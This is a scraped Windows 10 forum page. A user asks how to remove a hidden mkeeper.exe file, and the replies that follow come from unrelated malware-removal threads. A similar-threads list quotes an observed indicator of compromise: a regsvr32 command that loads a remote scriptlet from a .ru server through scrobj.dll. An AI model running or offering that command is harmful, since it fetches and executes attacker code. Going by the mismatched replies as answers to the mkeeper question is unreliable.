Windows 10: Unable to remove mkeeper.exe malware

Discus and support Unable to remove mkeeper.exe malware in AntiVirus, Firewalls and System Security to solve the problem; I have W10 Home 64bit v10.0.18363.900. I use McAfee Total Protection as my real time security app. I also use Malwarebytes, SuperAntiSpyware, Spybot... Discussion in 'AntiVirus, Firewalls and System Security' started by Default_861, Jun 27, 2020.

1. Unable to remove mkeeper.exe malware

I have W10 Home 64bit v10.0.18363.900. I use McAfee Total Protection as my real time security app. I also use Malwarebytes, SuperAntiSpyware, Spybot S&D and Rogue Killer free editions to do adhoc manual scans. In my most recent SAS scan, it spent a long time on C:\ProgramData\Microsoft\Windows\MKeeperStat\mkeeper.exe. This is how I identified the file was on my pc. Eventually the scan moved on. SAS didn't flag the file as malware. Not being aware of the file or it's purpose I searched it online. Every hit said it's malware and should be removed asap. I have 2 problems there. None of my security apps, mentioned above, flag the file as malware.

The MKeeperStat folder and mkeeper.exe file don't appear in Windows Explorer. I have Show Hidden folders & Files selected. Based on an old community thread, I also downloaded and ran Adware and Farbar Recovery Scan Tool. Neither of them either found the file or didn't flag it as malware. Due to the potential damage this file might cause, I'd appreciate any help in how I can get rid of it. Thank you.

:)

Default_861, Jun 27, 2020

2. Best way to remove problem Malware

Hi There,

I am trying to remove a bundle of Malware without success.

There is a bundle of listed programs which I try to uninstall through the typical Control Panel effort, but they remain listed there:

Buenosearch Toolbar
    MyPC Backup
    PC Performer
    Speed Test 127
    UnknownFile

I was looking at this weblink which provides a 5 step process for Buenosearch alone:
    Remove Bueno Search (Removal Guide)

Not sure how much certain guides can be trusted. One of the first things I read was to download Revo Uninstaller, and I've not heard of it so I'm not sure if it's trustworthy..........

radioraheem, Jun 27, 2020
  3. removal of sidecubes malware

Do not get SpyHunter. It's just as bad as the malware you have,

Follow the steps here.

Remove SideCubes Search (Virus Removal Guide)

If it is not listed in the Control Panel, or it can't be removed there, move on to step 2. HitmanPro might not be needed.

Bruce Hagen, Jun 27, 2020
  4. Amadeus51 Win User

Unable to remove mkeeper.exe malware

Malware removal

Understood, OldMike. I will keep your suggestion in mind. I always appreciate suggestions from those who know more than I do. I think the Malware did do more than one scan, because I had to approve removal of what it found twice. I don't see Windows Defender on the list of programs. I think it was on there before they redid the software. Pluto TV also disappeared.

Amadeus51, Jun 27, 2020
Thema:

Unable to remove mkeeper.exe malware

1. Unable to remove mkeeper.exe malware - Similar Threads - Unable remove mkeeper

2. Unable to remove malware

in AntiVirus, Firewalls and System Security
    Unable to remove malware: Hi, Earlier today I got a notification from Windows Security saying I had Malware on my computer. I searched for where it was coming from and it was from Bloom.exe. I tried uninstalling the app but I couldn't find it anywhere on my apps and programs or on my control panel,...
  3. Malware removal

Malware removal: Hello today i was checking task manager and found out that half of the RAM resourses were used somewhere and found out that trojan type malware have been dowanloadet on my PC and now i was wondering how to remove it the folder it resdies in has no stuff in it and it messed...
  4. regsvr32.exe as Malware

in Windows 10 BSOD Crashes and Debugging
    regsvr32.exe as Malware: Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know...
  5. Unable to remove mkeeper.exe malware

Unable to remove mkeeper.exe malware: I have W10 Home 64bit v10.0.18363.900. I use McAfee Total Protection as my real time security app. I also use Malwarebytes, SuperAntiSpyware, Spybot S&D and Rogue Killer free editions to do adhoc manual scans. In my most recent SAS scan, it spent a long time on...
  6. is Excelcnv exe malware?

is Excelcnv exe malware?: I have problems with my PC performance. Today I found a program file called excelcnv. I think it is malware but I am not sure. Can I delete this file? c:/programfiles(X86)/microsoftoffice/root/office16 Thank you....
  7. malware removal

malware removal: How to remove a rogue Chromium from windows 10 ver 1903 https://answers.microsoft.com/en-us/windows/forum/all/malware-removal/0b4e954c-b9b2-4458-b2f7-c9713d40ac53"
  8. Defender unable to find and remove virus or malware

in Windows 10 BSOD Crashes and Debugging
    Defender unable to find and remove virus or malware: Hi, there seems to be an elusive virus on my Wins 10 hard drive even though I have used Defender (updated) to do mini and full scans online and offline. It initially took downloaded software from Brother website, and Kindle app from Amazon website and installed them on a...
  9. malware removal

malware removal: My computer is infected with malware called eleseems-insector. How can I remove it. https://answers.microsoft.com/en-us/protect/forum/all/malware-removal/7c20f981-2735-49e6-a327-541f0f686bd0
  10. Malware removal

Malware removal: Hello. I am running Windows 10. I had a pop up take over my screen while online, using Firefox. It started talking to me and telling me I was under attack, etc. Figured it was ransomware and shut down pc immediately. I have run scans using Defender, AVG, Avast, Spybot, and...